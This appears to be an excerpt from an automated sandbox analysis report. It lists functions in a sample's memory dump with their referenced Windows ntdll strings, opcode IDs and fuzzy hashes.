                                                                                                                              • Instruction Fuzzy Hash: BB413475545701ABD721EB68DD44B5B7BE8FF88B60F00482EF949D3298E7B4D801CB91
                                                                                                                              Function 01A9C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • @, xrefs: 01A9C1F1
                                                                                                                              • PreferredUILanguages, xrefs: 01A9C212
                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A9C1C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                              • API String ID: 0-2968386058
                                                                                                                              • Opcode ID: a7a4de6a46fc1a004c20004e8e5c23751e166f792279a1e9e6ebf80515437823
                                                                                                                              • Instruction ID: 4c56a1711b4ba4a640df379ca38429a146576fea08d0b4f818bc66fedc67c9ae
                                                                                                                              • Opcode Fuzzy Hash: a7a4de6a46fc1a004c20004e8e5c23751e166f792279a1e9e6ebf80515437823
                                                                                                                              • Instruction Fuzzy Hash: F9418371E00619FBDF11EBD8C991FEEBBF8AB54710F1440AAE609B7284D7749A84CB50
                                                                                                                              Function 01A74144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                              • API String ID: 0-1373925480
                                                                                                                              • Opcode ID: c439424297b84e7817556116f38f06e6c0ab23eaa76b2c5ac2f8c9ad72a01383
                                                                                                                              • Instruction ID: 71bf8d1764c7be3c04f6d04bd2fe59d1dcdf10dd3008c11f5c69a9341980b3e0
                                                                                                                              • Opcode Fuzzy Hash: c439424297b84e7817556116f38f06e6c0ab23eaa76b2c5ac2f8c9ad72a01383
                                                                                                                              • Instruction Fuzzy Hash: 80412572A047498FEB26DBD9DC40BADBBB8FF99340F18045AD905EB791D7348A01CB51
                                                                                                                              Function 01A64755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrpCheckRedirection, xrefs: 01A6488F
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A64888
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01A64899
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-3154609507
                                                                                                                              • Opcode ID: 43cca8f5bf927d4864d665872ac90e315aac23f8de62056a6e54f9c780b954f4
                                                                                                                              • Instruction ID: 3140d1479d55e4c3075eca20379bcf9a077816cc8aa251064036d8cf3d852d12
                                                                                                                              • Opcode Fuzzy Hash: 43cca8f5bf927d4864d665872ac90e315aac23f8de62056a6e54f9c780b954f4
                                                                                                                              • Instruction Fuzzy Hash: B741CF32A057519FCB22CF68D940A66BBECFF8EA50B0A0669ED49D7251D730E800CB91
                                                                                                                              Function 019F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-2558761708
                                                                                                                              • Opcode ID: 01014fda5b9c84a872af9b60a50e34a052f76957cc2a3c15cc5e32fa2141429b
                                                                                                                              • Instruction ID: 6cde79e474647ff08212aaec63e933a266dca4017b258df189a6f33e557fbd1a
                                                                                                                              • Opcode Fuzzy Hash: 01014fda5b9c84a872af9b60a50e34a052f76957cc2a3c15cc5e32fa2141429b
                                                                                                                              • Instruction Fuzzy Hash: C411CD31716146AFEB29CB18C480B6AB3AAAF8162AF19811DF50ACF252DB30E841C750
                                                                                                                              Function 01A620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrpInitializationFailure, xrefs: 01A620FA
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A62104
                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 01A620F3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2986994758
                                                                                                                              • Opcode ID: 738fe41110167472482141ce4b4ae194381cc86226df9b1df1a8d178bdaf186c
                                                                                                                              • Instruction ID: d08c68a4ad1476670356f9ed2c0802ef688a51ffa3ac005ec4efe588bebe998c
                                                                                                                              • Opcode Fuzzy Hash: 738fe41110167472482141ce4b4ae194381cc86226df9b1df1a8d178bdaf186c
                                                                                                                              • Instruction Fuzzy Hash: 08F02278640708ABEB24E70CCD46F9A3B7CEB80F04F100029FB4477281D2F0A900CA82
                                                                                                                              Function 019F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: #%u
                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                              • Opcode ID: dbffcfca558e3c22ce1de84d477125c48c5f4723f796f44fff10b763c921b25a
                                                                                                                              • Instruction ID: 116ebb6ec6ca9488bf261eb8bda1d6b8f8f98ed4d26c21ec1ddd38868a5f0bc2
                                                                                                                              • Opcode Fuzzy Hash: dbffcfca558e3c22ce1de84d477125c48c5f4723f796f44fff10b763c921b25a
                                                                                                                              • Instruction Fuzzy Hash: 9E713D71A0014AAFDB01DF99C990FAEB7F8FF58704F154069EA05E7251EA38EE45CB60
                                                                                                                              Function 019EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrResSearchResource Exit, xrefs: 019EAA25
                                                                                                                              • LdrResSearchResource Enter, xrefs: 019EAA13
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                              • API String ID: 0-4066393604
                                                                                                                              • Opcode ID: 6209d3c88cf36308f19cdc9a697b97b5f898366af521932363762ffb01581e8d
                                                                                                                              • Instruction ID: a6cc4b27f38ad7d05c4c56824cc40b5e8858979d083682b6acbeaca7cad58c4a
                                                                                                                              • Opcode Fuzzy Hash: 6209d3c88cf36308f19cdc9a697b97b5f898366af521932363762ffb01581e8d
                                                                                                                              • Instruction Fuzzy Hash: 9BE16171E00319AFEF22CF99D984BAEBBBABF98310F144526F905E7261D7749940CB50
                                                                                                                              Function 01AAA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `$`
                                                                                                                              • API String ID: 0-197956300
                                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                              • Instruction ID: e5fe53fc57322e72315f0d36e5587ec00bbc7c0aaa329babe31dae4309bc569a
                                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                              • Instruction Fuzzy Hash: 00C1C0312043429BEB25CF28C941B6BBBE5BFC4318F484A2DF696CB291D779D905CB91
                                                                                                                              Function 01A5E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                              • Opcode ID: 1301392d4c3f67cda209453558b061d0c8c19d0e66d2017938abc25131d3aec2
                                                                                                                              • Instruction ID: 40e5f1c4958c09d09e820f385dca471e5dbe5e2b07c2b6f000a9cf15f7ce82e6
                                                                                                                              • Opcode Fuzzy Hash: 1301392d4c3f67cda209453558b061d0c8c19d0e66d2017938abc25131d3aec2
                                                                                                                              • Instruction Fuzzy Hash: B4613AB2E046199FDB55DFA8C940BADFBF5FB48700F14406DEA49EB251D731AA40CB50
                                                                                                                              Function 01A843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$MUI
                                                                                                                              • API String ID: 0-17815947
                                                                                                                              • Opcode ID: 004f3da2bcde88be438558cc65baeb9675909073b877dd248f0c173fc935221c
                                                                                                                              • Instruction ID: 06dd6f589e5a442ca8607f32401de1f1d2885a9f283a4c8d2c546d218b55ae3e
                                                                                                                              • Opcode Fuzzy Hash: 004f3da2bcde88be438558cc65baeb9675909073b877dd248f0c173fc935221c
                                                                                                                              • Instruction Fuzzy Hash: D5510971D0021EAFEF11EFA9CD90BEEBBB9EB58754F10052AE615B7290D6309D05CB60
                                                                                                                              Function 019E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • kLsE, xrefs: 019E0540
                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019E063D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                              • API String ID: 0-2547482624
                                                                                                                              • Opcode ID: b8b013ad5c56ddb253598f994272f3ee7b36384806fa5eeffe85753cf4e791d9
                                                                                                                              • Instruction ID: fb81039238f2ceb96cbf75db728fd1ef13ff88600c7be0ff4cdf1725494abb13
                                                                                                                              • Opcode Fuzzy Hash: b8b013ad5c56ddb253598f994272f3ee7b36384806fa5eeffe85753cf4e791d9
                                                                                                                              • Instruction Fuzzy Hash: 7451ED716007429BC726EF69C5487A3BBE8AF84700F18493EE69E87241E7B0D505CF91
                                                                                                                              Function 019EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 019EA2FB
                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 019EA309
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                              • API String ID: 0-2876891731
                                                                                                                              • Opcode ID: 86112a5387f4656728c5c50e7e7d634057ca8b4c625d34ef986d053ddc85d41a
                                                                                                                              • Instruction ID: 4a7a0fbc69c9fb64ba960778c4bda008ca5c58f89025e93657b5ff23a58762a4
                                                                                                                              • Opcode Fuzzy Hash: 86112a5387f4656728c5c50e7e7d634057ca8b4c625d34ef986d053ddc85d41a
                                                                                                                              • Instruction Fuzzy Hash: 6E41BE30A04649DFEB16CF59D844B6EBBF4FF84700F1444AAE918DB2A1E3B5DA41CB50
                                                                                                                              Function 01A1A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                              • Opcode ID: d2d9fa9d98954d1b6cb527cdfc0c46a2f1ad11df5f86b12b479be9b279a7f51c
                                                                                                                              • Instruction ID: d8dd8ec3dd2485961a308d773d5a6f9f0e13fbf5ccc54653a4224498d24dacaf
                                                                                                                              • Opcode Fuzzy Hash: d2d9fa9d98954d1b6cb527cdfc0c46a2f1ad11df5f86b12b479be9b279a7f51c
                                                                                                                              • Instruction Fuzzy Hash: 2101DCB2246B80AFE321DF24CE45B2677E8E794B25F058939E66CC7194E334E804CB46
                                                                                                                              Function 019EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: MUI
                                                                                                                              • API String ID: 0-1339004836
                                                                                                                              • Opcode ID: f45ec9e88dc7a05bcae0bd5c6ae0d503ca52eebbcb4fb1af1c7f8c950ba2c6fd
                                                                                                                              • Instruction ID: f2d4c34e88dae8d53e5d4bef528b8ebfc2d4ad548fd78546737baa557d1b49b8
                                                                                                                              • Opcode Fuzzy Hash: f45ec9e88dc7a05bcae0bd5c6ae0d503ca52eebbcb4fb1af1c7f8c950ba2c6fd
                                                                                                                              • Instruction Fuzzy Hash: 08827B75E002198FEB26CFA8C988BEDBBF5BF48710F148169E95DAB391D7309941CB50
                                                                                                                              Function 01A66420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 8f0c5a37584c28921307cb8c41f03224e019980753449f47a4abb4c9bebeb50a
                                                                                                                              • Instruction ID: cee76c2411b6b7759a2fdf9d1ce9b637e7c6a51791bd8fe7815484d01ef27436
                                                                                                                              • Opcode Fuzzy Hash: 8f0c5a37584c28921307cb8c41f03224e019980753449f47a4abb4c9bebeb50a
                                                                                                                              • Instruction Fuzzy Hash: A1917371900619BFEB25DF95DD85FAEBBB8EF58750F100065F605AB190D774AD00CBA0
                                                                                                                              Function 01A8E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 2beef990c28f91ae39cf8d1ca3cf59a94eaedcb97b49093ca8d0dcae3eaed10e
                                                                                                                              • Instruction ID: 66d83b8fa9c79eb511ea0749c2b3e6eba763ac94bb19be12b970b07c097bde90
                                                                                                                              • Opcode Fuzzy Hash: 2beef990c28f91ae39cf8d1ca3cf59a94eaedcb97b49093ca8d0dcae3eaed10e
                                                                                                                              • Instruction Fuzzy Hash: 9091AD3290164AFEDF22ABA4DD44FAFBBB9EF85750F140029F605A7250EB749D01CB90
                                                                                                                              Function 01A1A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: GlobalTags
                                                                                                                              • API String ID: 0-1106856819
                                                                                                                              • Opcode ID: 1e4add53e976b3ed2e46881a7a1053da3ccbd2d28f61d60491c6ded9828d14ae
                                                                                                                              • Instruction ID: 3fc4dee03b3b981ab53a018c688d55578d523c3b98c73224bd8ab8a5e6245aa0
                                                                                                                              • Opcode Fuzzy Hash: 1e4add53e976b3ed2e46881a7a1053da3ccbd2d28f61d60491c6ded9828d14ae
                                                                                                                              • Instruction Fuzzy Hash: E871A2B5E0420ADFDF69CF9CD5906EDBBB2BF88710F54812EE909A7245E7309841CB60
                                                                                                                              Function 01A84978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .mui
                                                                                                                              • API String ID: 0-1199573805
                                                                                                                              • Opcode ID: a2f69833ef169602f3066fcef65b1ecfb863f7712f43c6cb20892a8a5b268ad6
                                                                                                                              • Instruction ID: 02fc5ff335950bac4e963f78aceb8816562a8c7ae87fa2cddfdc72389b040d83
                                                                                                                              • Opcode Fuzzy Hash: a2f69833ef169602f3066fcef65b1ecfb863f7712f43c6cb20892a8a5b268ad6
                                                                                                                              • Instruction Fuzzy Hash: 0F518072D0022ADBDF11EF99D944BAEFBB4AF5CB10F05412AEA15BB240D7349901CBA4
                                                                                                                              Function 019FE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: EXT-
                                                                                                                              • API String ID: 0-1948896318
                                                                                                                              • Opcode ID: 776f0d5a83e59e8bf386c782382fbd31a8d6257399dcef6f11d413f32a5df77d
                                                                                                                              • Instruction ID: 317280e6e8acbbaa99e41fbafcdd7aa5f796edd605039f781e599bc2321cac05
                                                                                                                              • Opcode Fuzzy Hash: 776f0d5a83e59e8bf386c782382fbd31a8d6257399dcef6f11d413f32a5df77d
                                                                                                                              • Instruction Fuzzy Hash: 54417F72508352ABD711DA75C980B6BBBE8AFC8714F06092DFA8CE7190E674DA04C796
                                                                                                                              Function 01A5C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryHash
                                                                                                                              • API String ID: 0-2202222882
                                                                                                                              • Opcode ID: 60f4e2e6a2bdde3e9b3ef4338dca8b3c11486f5328342ac739b205fcd3865e44
                                                                                                                              • Instruction ID: 22630c9e2d0eca58bca547d09365c165cf9cd015ee2c6f03acb7a6d7cbe2e91d
                                                                                                                              • Opcode Fuzzy Hash: 60f4e2e6a2bdde3e9b3ef4338dca8b3c11486f5328342ac739b205fcd3865e44
                                                                                                                              • Instruction Fuzzy Hash: DB4184B1D0422DABDB21DB64CD80FDEB77CAB55724F0045A5EB08AB144DB709E88CFA4
                                                                                                                              Function 01A76B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #
                                                                                                                              • API String ID: 0-1885708031
                                                                                                                              • Opcode ID: 49a0cac73e7f8d4a5166a6e96627e909bf59149c40ddbe17bc640972ee64ae05
                                                                                                                              • Instruction ID: 4e0faee56f22d942c722383c376e0182ee27a5964849898680fbce43941100e6
                                                                                                                              • Opcode Fuzzy Hash: 49a0cac73e7f8d4a5166a6e96627e909bf59149c40ddbe17bc640972ee64ae05
                                                                                                                              • Instruction Fuzzy Hash: E431F631E00B199AFB22DF69CC50BBE7BB8DF45704F144028EA59AB282D775DA05CB54
                                                                                                                              Function 01A5CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryName
                                                                                                                              • API String ID: 0-215506332
                                                                                                                              • Opcode ID: 8f449600fb95424ab4ffb44c49f465f9f343844afd7f166f3198571c4f066396
                                                                                                                              • Instruction ID: d9baffd518733a51f3f55ba63895614a8c898bb158ce9d3f8df460bfa9e21fdc
                                                                                                                              • Opcode Fuzzy Hash: 8f449600fb95424ab4ffb44c49f465f9f343844afd7f166f3198571c4f066396
                                                                                                                              • Instruction Fuzzy Hash: 2D31E336904616AFEB15DB59C855E6FBB78EB80730F024129EE15A7258E730AE04DBE0
                                                                                                                              Function 01A6892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A6895E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                              • API String ID: 0-702105204
                                                                                                                              • Opcode ID: ac80e7dacc1bf9ecfd7209042e7bb3d09a6cb7507805debfe6c2a8e2c46cb5f0
                                                                                                                              • Instruction ID: 6431bb46a4d1b654b112a2862bd7f18fbaf2a9c39df7355f837bdc99228b3a31
                                                                                                                              • Opcode Fuzzy Hash: ac80e7dacc1bf9ecfd7209042e7bb3d09a6cb7507805debfe6c2a8e2c46cb5f0
                                                                                                                              • Instruction Fuzzy Hash: C201F237201701AFE6316B59C988A6A7BBDFFD5698F08042CF64687151CB34A885C792
                                                                                                                              Function 01A82000 Relevance: .8, Instructions: 757COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b63e60fd0430bb516232109c7529fc674eab2d736b504588e29819a887a74134
                                                                                                                              • Instruction ID: f0c1a087509e665275f7f52fa9be1a616c142a498dd51ffcf6c431dfa55fdc35
                                                                                                                              • Opcode Fuzzy Hash: b63e60fd0430bb516232109c7529fc674eab2d736b504588e29819a887a74134
                                                                                                                              • Instruction Fuzzy Hash: FF42D5756083419FDB26EF69C890B7BBBE5BF88300F58092EFA8697250D770D845CB52
                                                                                                                              Function 01A78158 Relevance: .6, Instructions: 617COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7fef668851bb49ecfe816bc26fe58f15f60ce6cc729d3a32869bb750a3bd8c92
                                                                                                                              • Instruction ID: 9804d2630162c1ce0f525fa09770207f49dafa99bfc702b95d307212fa48c83a
                                                                                                                              • Opcode Fuzzy Hash: 7fef668851bb49ecfe816bc26fe58f15f60ce6cc729d3a32869bb750a3bd8c92
